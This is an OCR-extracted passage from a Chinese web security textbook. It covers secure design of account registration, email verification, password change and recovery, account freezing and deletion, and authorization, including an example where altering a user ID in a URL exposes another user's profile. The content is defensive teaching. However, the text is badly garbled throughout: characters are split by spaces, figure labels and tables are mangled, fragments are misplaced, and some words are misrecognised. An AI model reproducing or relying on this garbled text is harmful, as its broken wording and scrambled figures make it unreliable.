本 节 将 针对 账号 (用户 ) 管理 实现 上 需要 注意 的 地 方 加 以 说 明 。 在 账号 管理 当中 ， 用 户 ID 
(登录 ID )、 密 码 、 邮 箱 地 址 等 的 管理 和 安全 性 关联 特别 紧密 。 以 下 功能 和 这 几 方 面 紧密 有 关 ， 
我 们 将 主要 对 在 实现 这 些 功 能 时 需要 注意 的 安全 事项 进行 说 明 。 

用 户 注 册 
修改 密码 
修改 邮箱 地 址 
密码 找 回 
账号 冻结 
账号 删除 

















5.2.1 用 户 注 册 


用 户 注册 的 时 候 ， 一 般 都 会 需要 提供 前 面 提 到 过 的 用 户 ID 、 密 码 、 邮 箱 地 址 等 信息 ， 需 要 
注意 的 安全 事项 如 下 。 


邮箱 地 址 确认 
防止 用 户 ID 重复 
应 对 自动 用 户 注册 ( 即 程序 自动 进行 的 机 器 人 注册 ， 此 项 内 容 为 非 必须 事项 ) 
关于 密码 的 注意 事项 
上 面 第 四 点 关于 密码 的 相关 问题 ， 我 们 在 前 面 的 5.1 节 里 面 已 经 详细 介绍 过 了 ， 这 里 将 不 再 
讨论 。 
另外 ， 除 了 上 面 提 到 的 几 点 之 外 ， 用 户 注 册 时 还 容易 发 生 下 面 两 种 安全 漏洞 。 
SQL 注入 漏洞 (4.4.1 节 ) 
邮件 头 注入 漏洞 (4.9.2 节 ) 
关于 上 面 两 种 脆弱 性 请 参考 第 四 章 的 相关 章节 。 下 面 我 们 就 开始 对 用 户 注 册 功 能 的 注意 事项 
进行 说 明 。 








邮箱 地 址 确认 


在 需要 认证 的 网 站 里 邮箱 地 址 有 着 举足轻重 的 地 位 ， 除 了 能 够 用 它 来 找 回 密码 ， 还 能 在 修改 
密码 或 者 账号 被 锁定 时 用 来 发 送 系统 通知 。 特 别 是 有 密码 找 回 功能 的 网 站 ， 如 果 密 码 通知 邮件 错 
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误 的 发 给 了 其 他 人 邮箱 的 话 
所 以 在 用 户 注册 、 修 改 





， 那 就 变 成 安全 事故 了 。 
电子 邮箱 地 址 的 时 候 ， 需 要 确认 用 户 提供 的 邮箱 是 否 能 收 到 系统 发 送 

















的 邮件 ， 即 进行 邮箱 的 收 信和 确认 。 具 体 的 话 有 下 面 两 种 方法 。 





将 带 有 令 牌 的 URL 通过 邮件 发 送 到 用 户 邮 箱 ， 用 户 在 收 到 邮件 点 击 URL 后 进行 后 续 操 作 


(方法 A) 
用 户 输入 邮箱 地 址 后 
址 (方法 B) 


上 面 两 种 方法 都 会 给 用 


， 转 向 令 牌 确认 页 面 。 令 牌 则 通过 邮件 发 送 到 用 户 输入 的 电子 邮箱 地 





户 指定 的 邮箱 发 送 令 牌 ， 然 后 通过 确认 用 户 输入 的 令 牌 来 进行 邮箱 地 


址 合法 性 的 验证 。 方 法 A 和 方法 B 不 不 同 的 地 方 是 , 方法 A 在 邮件 正文 里 提供 了 一 个 URL， 用 


户 点 击 URL 打开 网 页 即 可 。 


方法 B 的 话 则 需要 用 户 手 工 在 页 面 上 输入 在 邮件 里 收 到 的 令 牌 。 


方法 A 的 处 理 流程 如 图 5-16 所 示 。 方 法 A 的 话 在 用 户 在 输入 邮箱 地 址 后 ， 验 证 过 程 会 临时 
停止 ， 等 用 户 收 到 邮件 并 点 击 里 面 的 URL 后 ， 又 会 继续 后 面 的 验证 过 程 。 


图 5-16 邮件 收 信 确 认 (方法 A) 










































































请 输入 邮件 地 址 

















将 邮件 地 址 和 令 牌 
保存 到 数据 库 
从 数据 库 里 以 令 牌 为 key 
查找 用 户 的 邮件 地 址 
确认 邮件 已 经 
让 中 入 继续 邮件 地 址 
生成 人 和 >" 



























































69606a520824d9b07 
用 户 打开 指定 URL 
向 的 邮箱 发 送 带 有 http://example.jp/? 
令 牌 的 确认 地 址 URL 一 k=69606a520824d9b07 


http://example.jp/? 
k=69606a52Q! mad9b07 
各 








和 方法 A 不 同 的 是 , 方法 B 只 在 邮件 里 发 送 令 牌 ， 而 不 带 任何 URL 信息 ， 且 页 面 切换 过 程 














不 会 中 断 ， 用 户 需 要 在 下 一 页 面 输入 在 邮件 里 收 到 的 令 牌 。 令 牌 在 用 户 打开 邮件 之 前 属于 秘密 信 








息 ， 不 能 放 在 hidden 元 素 里 在 页 面 间 传递 ， 所 以 需要 将 令 牌 的 值 保存 在 会 话 中 。 
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图 5-17 邮件 收 到 确认 (方法 B) 




















































请 输入 邮件 
验证 码 
| sss4193 


生成 令 租 验证 码 ), 发 送 





的 








请 输入 邮件 地 址 











填写 其 他 内 容 





























人 太公 上 旦 未 王公 
仿 租 令 租 是否 正 研 



















































































































































































































































































到 用 户 输 入 的 邮件 地 址 令 牌 保存 在 会 话 里 ) 
se 8534193 
8534193 
下 表 总 结 了 方法 A 和 方法 B 各自 的 优 缺 点 。 
表 5-4 用 户 邮 箱 地 址 确认 方法 的 优点 、 缺 点 
方法 A 方法 B 
优点 . 操作 体验 较 好 e 不 必 让 用 户 再 去 访问 其 他 URL 
“| 。 需 要 长 时 间 确 认 邮 件 时 也 能 应 对 。 容易 实现 
e 实现 起 来 较 麻 烦 。 需 ' 输 入 验证 码 ， 对 用 户 来 有 点 麻烦 
缺点 e 强迫 用 户 去 访问 邮件 里 的 URL 有 点 不 太 方 便 e 如 果 邮 件 发 送 后 用 户 不 能 立即 收 到 会 导致 验证 失败 
人 e 有 的 邮件 客户 端的 可 能 会 把 URL 做 截断 处 理 ， 导 致 | “无 法 注 几 
点 击 后 没 反 应 或 者 打开 错误 的 页 画 e 如 果 是 用 手机 操作 的 话 可 能 会 比较 麻烦 
































实际 中 可 能 采用 更 多 的 是 方法 A, 但 是 在 邮件 里 发 送 URL 的 话 ， 可 能 会 对 预防 钓鱼 攻击 措 
施 带 来 不 利 影响 ， 所 以 本 书 里 反而 推荐 使 用 方法 B。 








防止 用 户 1D 重复 


用 户 ID， 即 用 户 登 录 名 ， 必 须 保持 唯一 性 。 笔 者 进行 网 站 的 安全 咨询 工作 时 ， 就 遇 到 过 能 
使 用 重复 用 户 ID 注册 的 情况 ， 这 里 介绍 一 下 笔者 见 过 的 用 户 ID 重复 的 例子 。 


令 例子 1: ID 相同 密码 不 同 可 以 注册 的 网 站 

有 一 个 会 员 系 统 网 站 的 用 户 A 忘 了 自己 的 密码 ， 作 为 尝试 将 用 户 ID 作为 密码 输入 后 竟然 登 
录 成 功 了 ， 而 且 看 到 的 个 人 信息 也 都 是 别人 的 。 

调查 后 发 现 ， 即 使 用 户 ID 相同 ， 如 果 密 码 不 同 的 话 也 能 在 这 个 网 站 上 注册 成 功 。 而 A 用 户 
只 是 偶然 地 登录 进 和 用 户 ID 相同 的 其 他 账号 而 已 。 

















令 例子 2: 用 户 ID 没有 添加 唯一 性 约束 的 网 站 
笔者 曾 负责 检查 一 个 网 站 的 安全 漏洞 ， 检 查 发 现 该 网 站 在 经 过 特殊 的 操作 之 后 ， 可 以 使 用 
重复 的 用 户 ID 注册 多 个 账号 。 笔 者 建议 网 站 的 管理 员 在 数据 库 的 表 定 义 上 给 用 户 ID 加 上 唯一 
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( UNIQUE ) 约束 ,但 是 他 们 的 系统 在 删除 用 户 的 时 候 做 的 是 逻辑 删除 ( 即 在 数据 库 里 给 被 删除 的 
记录 设置 删除 标记 代表 用 户 已 被 删除 )， 所 以 不 能 在 表 定 义 上 做 唯一 约束 。 

这 样 的 网 站 在 现实 中 应 该 为 数 不 少 ， 如 果 应 用 程序 存在 Bug 的 话 〈 比 如 竞争 / 互 斥 处 理 不 当 
等 )， 就 可 能 导致 产生 重复 用 户 DD 的 问题 。 

和 例子 1 一 样 ， 如 果 相 同 的 用 户 ID 能 注册 不 同 的 用 户 的 话 ， 就 存在 用 户 登 录 到 其 他 用 户 账 
号 里 的 风险 。 最 好 是 在 数据 库 的 定义 上 把 表示 用 户 ID 的 那 一 列 加 上 唯一 约束 。 如 果 现 实 不 允许 
设置 这 种 约束 的 话 ， 那 么 至 少 在 应 用 程序 里 必须 要 加 入 防止 用 户 ID 重复 的 逻辑 ， 在 处 理 互 斥 等 
操作 的 时 候 也 要 格外 细心 。 












































应 对 自动 用 户 注册 

如 果 Web 站 点 是 能 自由 注册 的 话 ， 那 么 攻击 者 有 了 时候 会 通过 程序 自动 注册 大 量 机 器 人 账号 。 
攻击 者 为 了 各 种 目的 到 处 注册 大 量 这 种 机 右 人 账号 ， 比 如 在 提供 邮件 服务 的 网 站 里 注册 大 量 用 
户 ， 然 后 用 这 些 用 户 发 送 垃圾 邮件 。 

根据 网 站 性 质 不 同 ， 这 种 大 量 自 动 注册 用 户 带 来 的 威胁 也 不 一 样 ， 如 果 已 经 预 估 到 这 种 风险 
或 者 已 经 因 这 种 攻击 而 带 来 损失 的 话 ， 可 以 采用 CAPTCHA ( 验证 码 ) 来 做 预防 。 






































令 利用 CAPTCHA 防止 自动 注册 

CAPTCHA (验证 码 ) 是 通过 故意 在 页 面 显 示 经 过 变形 处 理 的 文字 等 ， 让 用 户 确认 后 输入 ， 
来 验证 正在 操作 的 是 人 而 不 是 机 器 程序 在 执行 而 发 明 的 一 种 方法 。 

网 上 有 很 多 公开 的 在 PHP 等 中 使 用 的 CAPTCHA 库 ， 可 以 根据 自己 的 需求 去 选择 合适 的 库 
使 用 。 图 5-18 就 是 一 个 面向 PHP 的 叫 作 cool-php-captcha? 的 画面 截图 ， 这 个 库 基于 GPLv3 许可 
证 方式 公开 。 在 使 用 这 样 的 库 的 时 候 ， 除 了 要 看 它们 的 功能 和 方便 程度 之 外 ， 许 可 证 也 是 不 可 忽 
略 的 选择 条 件 之 一 。 


5-18 ”cool-php-captcha 提供 的 例子 画面 





























Write the following word: 


LICCUITG 
Not readable? Charge text. 


一 一 一 一 


提交 

















四 CAPTCHA 是 卡 内 基 梅 隆 大 学 的 注册 商标 ， 但 是 他 们 在 2008 年 4 月 21 日 放弃 了 该 商标 的 所 有 权 。 请 参考 http://tsdr. 
uspto.gov/#caseNumber=78500434&caseType=SERIAL NO&searchType=statusSearch 
©® https://code.google.com/p/cool-php-captcha/ 
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替 图 片 的 网 站 。 下 面 的 是 Google 用 户 注 册 时 的 CAPTCHA， 点 击 输入 框 右边 的 小 喇叭 图 标的 话 ， 
图 5-19 使 用 了 声音 的 CAPTCHA 
验证 身份 


就 会 播放 混 着 杂音 的 录音 ， 在 录音 里 播放 作为 验证 码 的 字符 。 用 户 可 以 在 收听 验证 码 后 输入 。 





有 时 候 使 用 CAPTCHA 会 给 用 户 的 使 用 体验 带 来 负面 影响 ,最 近 也 出 现 了 一 些 使 用 声音 代 


跳 过 此 验证 ‘可 能 需要 电话 验证 ) 





El 732% 
输入 这 两 个 单词 : 





< 


C 和 回 








行为 。 


即使 在 月 











如 果 考 虑 到 系统 被 自动 注册 大 量 账号 后 可 
CAPTCHA 功能 。 


El 


如 上 文 所 述 , 使 用 CAPTCHA 可 以 在 一 定 程度 上 达到 阻止 程序 进行 自动 用 户 注 册 的 恶意 


上 户 注册 界面 不 使 用 CAPTCHA 功能 ， 也 不 能 说 系统 就 存在 安全 上 的 隐患 。 但 是 
人 人 八 
5.2.2 ”修改 密码 

















纺 
带 来 何 种 损失 的 话 ， 那 么 请 一 定 要 考虑 下 使 用 


这 一 节 我 们 介绍 密码 修改 功能 在 安全 上 需要 注意 的 事项 ， 具 体 如 下 。 
需要 确认 当前 密码 


修改 密码 后 向 用 户 发 送 邮 件 通 知 


SQL 注入 漏洞 
CSRF 漏洞 





另外 ,在 修改 密码 时 可 能 存在 的 以 下 安全 漏洞 。 


下 面 分 别 对 这 几 项 进行 详细 说 明 。 
确认 当前 密码 





CSRF 漏洞 。 


当 用 户 想 要 修改 密码 的 时 候 ， 需 要 向 用 户 确 认 当 前 密码 (再 认证 )。 这 样 做 的 话 能 防止 
会 话 劫持 等 情况 下 攻击 者 直接 修改 用 户 密码 。 而 且 ， 通 过 再 认证 ， 还 能 防止 后 面 将 要 提 到 的 
典型 也 








图 5-20 是 典型 的 修改 密码 的 例子 。 





典型 安全 功能 
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5-20 ”修改 密码 页 面 的 示例 
| | 
请 输入 现在 的 密码 和 修改 三 的 密码 
原 密码 @@@@g@g@g@@ 
新 密码 @@@@g@g@g@@ 
新 密码 ( 确认 ) @@@@g@g@g@@ 
Sa 



































修改 密码 后 向 用 户 发 送 邮件 通知 
当 发 生 像 修改 密码 这 样 比较 重要 的 事件 时 ， 最 好 是 将 具体 信息 以 邮件 的 方式 通知 用 户 。 这 样 
即使 是 攻击 者 恶意 修改 了 密码 ， 用 户 也 能 尽早 发 现 并 且 采 取 措施 防止 受到 进一步 的 损失 。 
































密码 修改 功能 容易 发 生 的 漏洞 
密码 修改 功能 中 容易 发 生 的 漏洞 有 以 下 两 点 。 
SQL 注入 漏洞 
CSRF 漏洞 
如 果 修 改 密码 的 页 面 存在 SQL 注入 漏洞 的 话 ， 除 了 4.4.1 节 里 讲 的 常见 的 SQL 注入 危害 以 
外 ， 还 存在 以 下 危害 。 
绕 过 再 认证 而 直接 就 能 修改 密码 
修改 其 他 用 户 的 密码 
一 次 修改 所 有 用 户 的 密码 
此 外 ， 如 果 修 改 密码 页 面 存在 CSRF 漏洞 的 话 ， 就 会 像 第 4.5 节 里 说 的 那样 ， 存 在 攻击 者 在 












































修改 掉 密 码 后 ， 使 用 新 密码 登录 的 风险 。 
但 是 如 果 修 改 密码 时 使 用 上 面 提 到 的 再 认证 功能 的 话 ， 就 不 存在 CSRF 攻击 的 风险 了 。 


AE 























5.2.3 修改 邮箱 地 址 
用 户 修改 邮箱 地 址 也 会 对 影响 用 户 安全 。 如 果 用 户 邮箱 地 址 被 攻击 者 恶意 修改 的 话 ， 攻 击 者 


户 的 密码 或 者 设置 新 的 密码 。 
方式 有 以 下 几 种 ， 都 是 在 第 4 章 里 介绍 过 的 

















就 有 可 能 利用 密码 找 回 功能 得 到 月 
典型 的 被 利用 来 恶意 修改 用 户 邮箱 地 址 的 攻 了 


内 容 。 





会 话 动 持 
CSRF 攻击 
SQL 注入 攻击 


修改 邮箱 地 址 功能 要 考虑 的 安全 对 策 


在 实现 修改 邮箱 地 址 功能 时 ， 需 要 考虑 到 的 安全 因素 包括 下 面 几 项 。 


对 新 邮箱 地 址 进行 收 信 确 认 ( 请 参考 5.2.1 节 ) 
再 认证 〈 请 参考 上 一 节 ) 
邮件 通知 (请 参考 上 一 节 ) 


























修改 邮箱 地 址 后 的 邮件 通知 ， 需 要 给 修改 前 后 的 两 个 地 址 都 发 送 邮 件 。 














目的 是 为 了 在 邮箱 地 址 被 其 他 人 恶意 修改 后 能 够 及 时 通知 到 真正 用 户 。 








修改 邮箱 地 址 时 需要 的 对 策 总 结 
功能 方面 的 对 策 


。 邮箱 地 址 确认 
。 再 认证 
。 邮件 通知 ( 修改 前 后 的 两 个 邮箱 地 址 ) 

针对 容易 发 生 的 漏洞 的 对 策 
。 SOL 注入 漏洞 的 对 策 
。 CSRF 漏洞 的 对 策 ( 再 认证 的 话 可 以 解决 此 问题 ) 























5.2.4 ”密码 找 回 
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给 旧地 址 发 送 邮 件 的 


在 用 户 忘 记 密 码 时 , 我 们 要 通过 某 些 手 段 告知 用 户 密 码 或 者 让 用 户 设 置 新 密码 ， 这 个 功能 称 





为 密码 找 回 或 者 密码 重 置 。 











a 





不 管 采用 什么 方法 ， 都 需要 在 确认 用 户 的 合法 性 之 后 ， 将 密码 告知 用 户 或 者 引导 用 户 设置 新 


密码 。 把 现在 的 密码 告知 用 户 ， 称 为 (狭义 的 ) 密码 找 回 功能 ， 告 诉 用 户 修改 后 的 密码 ， 或 者 引 

导 用 户 设置 新 密码 ， 称 为 密码 重 置 。 在 这 一 节 里 ， 我 们 把 这 两 种 方式 统称 为 “密码 找 回 ”。 
密码 找 回 分 为 面向 管理 员 (不 是 供 管理 员 找 回 自己 的 密码 ， 而 是 管理 员 操作 找 回 普通 用 户 的 

密码 ) 和 面向 最 终 用 户 两 种 。 每 个 应 用 程序 都 应 该 提供 面向 管理 员 的 密码 找 回 功能 ， 而 面向 最 终 









































供 这 个 功能 。 








用 户 的 密码 找 回 功能 则 会 降低 系统 的 安全 系数 ， 所 以 需要 根据 自己 网 站 的 特点 来 决定 是 否 需要 提 
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典型 安全 功能 


面向 管理 员 的 密码 找 回 功能 
有 时 候 用 户 可 能 会 忘 








记 上 自己 的 密码 ， 这 时 候 他 们 就 会 向 网 站 管理 员 求 助 。 所 以 网 站 需要 提供 





供 管理 员 使 用 的 找 回 密码 功能 。 但 是 如 果 在 管理 员 使 用 的 密码 找 回 功能 里 明文 显示 密码 的 话 ， 就 





有 可 能 存在 密码 被 禄 取 等 安全 事故 ， 所 以 一 般 都 采用 密码 重 置 的 方式 实现 。 














管理 员 根 据 用 户 请 求 找 回 密码 按照 下 面 的 流程 进行 处 理 。 


1. 收 到 用 户 找 回 密 码 请 求 ， 对 请 求 者 进行 身份 验证 

2. 管理 员 重 置 密码 ， 将 临时 密码 告诉 用 户 

3. 用 户 使 用 临时 密码 登录 后 ， 立 即 修改 密码 

在 第 一 步 用 户 本 人 操作 确认 中 ， 最 常用 的 方法 是 通过 电话 确认 用 户 注册 时 填写 的 个 人 资料 等 
信息 。 但 是 这 样 很 容易 产生 假冒 他 人 的 问题 ， 所 以 需要 根据 自己 网 站 的 实际 情况 ， 选 择 最 合适 的 
确认 用 户 合法 性 的 方法 。 比 如 网 银 一 般 都 会 要 求 用 户 提供 申请 书 并 且 加 羡 注 册 时 使 用 的 印章 ， 然 
















































































后 将 重 置 的 密码 通过 信件 邮寄 给 用 户 9。 
在 对 用 户 进行 身份 合法 性 进行 验证 之 后 ， 需 要 将 重 置 后 的 密码 告诉 用 户 ， 一 般 来 说 最 好 不 直 











接 通 过 电话 ， 而 是 使 用 管理 程序 通过 电子 邮件 通知 用 户 。 其 原因 有 以 下 几 条 。 
管理 员 或 者 用 户 都 

如 果 有 人 冒名 打 来 电话 ， 能 减少 密码 泄漏 的 风险 
不 管 哪 种 情况 ,用户 在 收 到 重 置 的 密码 后 应 该 立即 修改 密码 。 为 了 实现 这 个 目的 ,可 以 使 用 
“临时 密码 ”， 临 时 密码 是 











全 部 功能 。 
这 里 我 们 总 


结 一 











不 会 看 到 密码 ， 不 会 造成 密码 泄露 





只 能 用 来 修改 自己 密码 的 密码 。 用 户 只 有 在 修改 密码 后 ， 才 能 继续 使 用 


下 ， 供 管理 员 使 用 的 密码 重 置 功能 的 需求 有 以 下 几 点 。 














验证 用 户 合法 性 时 显示 个 人 信息 (通过 电话 或 者 书面 确认 ) 
生成 临时 密码 并 告知 用 户 。 临 时 密码 不 直接 在 屏幕 上 显示 而 是 通过 邮件 发 送 


临时 密码 


只 能 在 登 














录 后 用 来 修改 密码 


面向 用 户 的 密码 找 回 功 能 





忘记 自己 密码 的 用 户 可 以 通过 面向 用 户 的 密码 找 回 功能 ? 找 回 自己 的 密码 或 者 重 置 密码 。 面 
向 用 户 的 密码 找 回 功能 也 沿用 在 确认 操作 者 的 合法 身份 后 再 向 用 户 发 送 密码 通知 的 流程 。 下 面 我 
们 对 此 进行 详细 说 明 。 























(D 根据 银行 不 同 ， 也 有 提供 通过 电话 或 者 网 站 重 置 密码 的 。 
@@， 单 说 “密码 找 回 ” 一 般 多 指 面向 个 人 用 户 的 “密码 找 回 ”功能 。 
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令 对 用 户 进行 身份 确认 
面向 个 人 用 户 的 密码 找 回 功能 通常 使 用 下 面 方法 来 确认 操作 者 的 合法 性 
让 用 户 在 注册 时 设置 安全 问题 和 答案 ， 在 用 户 找 回 密码 时 进行 确认 
通过 向 注册 的 邮箱 地 址 发 送 邮 件 确 认 用 户 的 合法 性 


但 是 上 面 的 这 两 种 方法 都 存在 用 户 被 冒充 的 可 能 性 ， 第 一 种 方法 里 如 果 安 全 问题 是 类 似 “ 你 
亲 的 姓 ”之 类 的 话 ， 答 案 很 容易 被 第 三 者 知道 。 如 果 采 用 第 二 种 方法 的 话 ， 如 果 邮 件 是 不 加 密 
发 送 的 话 ， 也 存在 着 被 监听 的 风险 。 

所 以 要 认识 到 ， 在 实现 供用 户 找 回 密码 功能 的 时 候 ， 存 在 用 户 被 冒充 的 风险 ， 只 有 在 能 接受 
这 个 风险 的 基础 上 再 去 实现 这 个 功能 。 
































令 如 何 发 送 密码 通知 
在 确认 了 用 户 的 合法 性 身份 之 后 就 要 通知 用 户 密码 信息 了 ， 如 何 实现 通知 ， 有 下 面 4 种 方法 
可 以 选择 。 


( A ) 通过 邮件 发 送 现在 的 密码 
(B ) 发 送 供用 户 修改 密码 的 URL 
(C) 通 过 邮件 发 送 临时 密码 

(DD ) 直接 转向 修改 密码 页 面 


在 本 书 里 我 们 推荐 使 用 (C ) 或 者 (D ) 方法 。 

方法 (A ) 首先 给 人 一 种 密码 没有 被 加 密 的 不 安全 感 ， 其次， 现在 密码 不 是 临时 密码 ， 万 一 
被 监听 并 盗 取 的 话 ， 在 用 户 不 知情 的 情况 下 可 能 会 被 持续 盗用 。 所 以 不 建议 使 用 方法 (A )。 

(B ) 的 话 有 一 种 强迫 让 用 户 养 成 查看 邮件 里 附带 的 URL 习惯 的 感 党， 笔者 觉得 不 是 很 好 。 

(C) 虽 然 也 存在 被 监听 的 风险 ,但 是 即使 临时 密码 被 攻击 者 得 到 并 修改 密码 ， 用 户 会 立刻 收 
到 修改 密码 的 邮件 通知 ， 因 为 此 时 用 户 本 人 肯定 还 没有 修改 密码 ， 所 以 立即 可 以 知道 之 前 的 临时 
密码 一 定 是 被 别人 恶意 次 用 了 。 使 用 方法 (C ) 的 大 致 流程 如 图 5-21 所 示 。 






































图 5-21 方法 ( C ) 操作 流程 示例 












































保密 问题 : 临时 密码 已 经 发 送 
输入 邮件 地 址 初恋 的 姓名 到 你 的 邮箱 了 。 
Kal3Pw5# 
密码 被 重 四 











在 这 种 方法 里 需要 注意 的 是 ， 在 用 户 输入 系统 不 存在 的 邮箱 地 址 时 ， 也 要 显示 保密 问题 确 
认 页 面 。 如 果 不 这 么 做 的 话 ， 攻 击 者 一 下 子 就 能 知道 所 使 用 的 邮箱 地 址 是 否 已 经 注册 过 了 。 所 以 
需要 在 系统 里 保存 一 些 预 置 的 保密 问题 ， 当 用 户 输入 的 邮箱 地 址 不 存在 时 ， 选 择 一 个 保密 问题 显 
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示 。 当 然 ， 这 时 候 用 户 无 论 怎么 回答 结果 应 该 都 是 错误 的 。 另 外 ， 对 于 同一 个 邮箱 地 址 ， 每 次 显 
示 的 预 置 保密 问题 也 应 该 是 同一 个 。 
在 上 面 的 操作 过 程 中 ,确认 保密 问题 是 不 可 省 略 的 一 步 。 如 果 省 略 了 ， 则 随便 谁 都 可 以 简单 
的 把 其 他 人 的 密码 置 为 无 效 了 。 即 使 不 能 置 为 无 效 ， 也 会 发 送 重 置 密码 邮件 ， 给 真正 的 用 户 带 来 
困扰 。 
发 送 给 用 户 的 临时 密码 只 能 用 于 修改 密码 。 此 外 用 户 在 修改 密码 时 ， 要 通过 邮件 通知 用 户 
( 请 参考 5.2.2 节 )。 
下 面 图 5-22 是 方法 (D ) 的 操作 流程 示意 图 。 


5-22 方法 ( D ) 操作 流程 示例 





































































































请 输入 邮件 里 的 保密 问题 : 新 密码 
输入 邮件 地 址 验证 码 初恋 的 姓名 @e@eee@e@g@g@e@ 
区 到 到 ea ga 
生成 令 牌 进行 令 牌 ( 验证 码 ) 的 验证 









































( 验证 码 ) 
光 


将 令 牌 ( 验证 码 ) 发 送 给 
注册 的 邮箱 地 址 


( 令 牌 存在 会 话 里 




















(CD ) 方法 不 会 向 用 户 发 送 临 时 密码 ， 为 了 确认 邮箱 使 用 了 令 牌 机 制 。 另 外 ， 由 于 已 经 验证 过 
了 令 牌 ,所 以 后 面 的 “保密 问题 ”步骤 可 以 省 略 。 

在 用 这 种 方式 去 实现 密码 找 回 通知 的 时 候 ， 需 要 注意 下 面 儿 点 。 

首先 ， 即 使 用 户 输入 的 邮箱 地 址 不 存在 ， 也 不 显示 错误 信息 ， 而 仍然 显示 令 牌 确认 页 面 。 
Pe Ele ea 

其 次 ,为 了 防止 针对 验证 码 ( 令 牌 ) 的 暴力 破解 ， 可 以 考虑 在 验证 码 验 证 错误 次 数 或 者 密码 
重 置 次 数 超过 一 定 值 之 后 ， 将 账户 冻结 。 但 是 ， 用 户 被 冻结 这 件 事 在 页 面 上 不 做 任何 提示 ， 而 是 
给 真正 的 用 户 发 送 邮 件 ， 指 引 其 向 客服 寻求 帮助 。 



































5.2.5 ”账号 冻结 


针对 特定 的 账号 ， 如 果 在 安全 性 上 出 现 什么 问题 的 话 ， 有 了 时候 我 们 可 能 会 暂时 冻结 该 账号 。 
具体 可 能 导致 账号 被 冻结 的 可 能 原因 有 如 下 几 点 。 
用 户 本 人 要 求 冻结 ( 比如 PC 被 偷 了 、 手 机 丢 了 ,或 者 收 到 了 密码 被 修改 的 邮件 等 ) 
账号 被 非法 使 用 的 时 候 
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除了 上 述 行为 之 外 ,在 用 户 违 反 了 网 站 的 使 用 规范 等 其 他 情况 下 也 可 能 导致 账号 被 冻结 。 
应 该 给 管理 员 提供 账号 冻结 及 解锁 的 功能 ， 并 且 像 5.2.4 节 所 提 到 那样 ， 如 果 是 用 户 自 己 要 
求 冻结 账号 或 者 解锁 的 话 ， 需 要 先进 行 用 户 的 身份 确认 ， 然 后 再 进行 相应 的 操作 。 


























5.2.6 ”账号 删除 


账号 删除 通常 来 说 是 不 可 恢复 的 操作 ， 为 了 确认 用 户 是 否 真 的 想 删 除 账 号 ， 且 为 了 预防 
CSRF 漏洞 ， 最 好 在 操作 时 进行 密码 确认 ( 再 认证 )。 
除 此 之 外 容易 在 账号 删除 功能 里 出 现 的 漏洞 是 SQL 注入 漏洞 。 














5.2.7 ”上 账号 管理 总 结 
这 一 节 里 我 们 对 账户 管理 方面 安全 性 上 的 注意 事项 做 出 了 说 明 。 下 面 我 们 总 结 了 在 各 个 功能 
里 都 需要 注意 的 事项 。 
用 户 输入 的 电子 邮箱 地 址 一 定 要 确认 收 信 
进行 重要 操作 的 时 候 进 行 再 认证 
执行 重要 的 处 理 后 发 邮件 通知 
另外 ， 在 账号 管理 里 比较 容易 发 生 的 安全 漏洞 也 有 下 面 几 个 。 
SQL 注入 漏洞 
CSRF 漏洞 
邮件 头 注 入 漏洞 ( 邮箱 地 址 注册 、 修 改 时 ) 
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5.3 ”授权 


在 本 节 中 我 们 将 介绍 授权 ( Authorization ) 控制 (访问 控制 )。 





5.3.1 什么 是 授权 
授权 指 的 是 给 认证 为 合法 的 用 户 分 配 相应 的 权限 ， 下 面 是 一 些 权 限 的 例子 。 


只 有 认证 用 户 才 能 使 用 的 功能 

销 户 处 理 、 转 账 、 创 建新 用 户 (以 管理 员 身 份 ) 等 

只 有 认证 用 户 才 能 查看 的 信息 

非 公 开 的 用 户 私 人 信息 、 非 公开 的 他 人 的 个 人 信息 (以 管理 员 身 份 )、 非 公开 的 论坛 内 容 、 
WebMail 等 

只 有 认证 用 户 才 能 执行 的 修改 操作 

用 户 本 人 的 信息 修改 (密码 、 个 人 简介 、 页 面 设置 等 )、 修 改 他 人 的 个 人 信息 (以 管理 员 
身份 )、 从 WebMail 发 送 邮 件 等 


授权 系统 存在 漏洞 的 话 ， 会 导致 个 人 信息 泄漏 、 权 限 被 恶意 使 用 等 众多 安全 上 的 问题 。 


























5.3.2 ”典型 的 授权 漏洞 
在 这 一 节 我 们 介绍 比较 有 代表 性 的 不 合理 的 授权 实现 案例 。 


更 改 资源 ID 后 可 以 查看 没有 权限 查看 的 信息 

很 多 URL 里 面 都 包含 表示 特定 资源 的 ID (这 里 我 们 叫 作 资源 ID )， 如 果 权 限 管理 做 的 不 够 充 
分 的 话 ， 那么 有 可 能 只 通过 修改 URL 里 的 这 个 ID 就 能 查看 本 来 没有 权限 查看 或 者 修改 的 数据 。 

我 们 下 面 以 图 5-23 的 例子 进行 说 明 。 图 5-23 显示 的 是 登录 ID 为 yamada 的 用 户 在 登录 网 站 
后 ， 查 看 自己 个 人 信息 的 页 面 流程 。 个 人 资料 表示 页 面 (图 右 侧 ) 的 URL 里 面包 括 了 要 查看 的 
资源 ID“id=yamada” 这 一 查询 字符 串 。 














图 5-23 ”用 户 确认 个 人 资料 的 页 面 流程 























使 用 id: yamada 登录 http://example.jp/profile.php?id=yamada 
于 | 





























欢迎 你 , yamada 























1D: yamada 
电子 邮件 地 址 : xx 
姓名 :山田 OO 


电话 : 03-X%0X-XOX 
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如 果 权 限 控 制 实 现存 在 漏洞 的 话 ， 我 们 可 能 只 需要 把 这 个 URL 里 的 id=yamada 换 成 别人 的 
用 户 ID， 那 么 就 有 可 能 查看 本 来 无 权 查 看 的 其 他 人 的 个 人 信息 了 。 比 如 把 id 换 为 id=sato 的 话 ， 
就 能 查看 sato 的 个 人 资料 了 。 如 图 5-24 所 示 。 


图 5-24 ”通过 修改 资源 ID 查看 别人 的 个 人 信息 
http://example.jp/profile.php?id=sato 




















欢迎 你 , yamada 














1 |D: sato 
电子 邮件 地 址 : xx 
姓名 : 佐藤 OO 


电话 : 03-XXXXcXOOCG 






































这 个 例子 里 资源 ID 是 放 到 URL 里 的 ， 所 以 出 现 漏洞 很 容易 理解 。 即 使 将 资源 ID 通过 hidden 
参数 放 到 POST 里 ， 或 者 放 到 Cookie 里 ， 还 是 不 能 避免 同样 问题 的 。 如 果 开 发 人 员 大 意 地 认为 
hidden 或 者 Cookie 里 的 值 不 会 被 人 修改 的 话 ， 就 可 能 因 朴 忽而 导致 发 生 类 似 的 安全 漏洞 。 

在 这 个 例子 里 资源 ID 是 用 户 ID,， 在 其 他 系统 里 它 可 能 会 是 交易 ID 、 文 档 ID、 邮 件 消息 ID 
等 。 不 管 哪 种 系统 ， 都 可 能 存在 风险 ， 只 通过 修改 资源 ID 就 能 查看 、 修 改 甚至 删除 等 。 











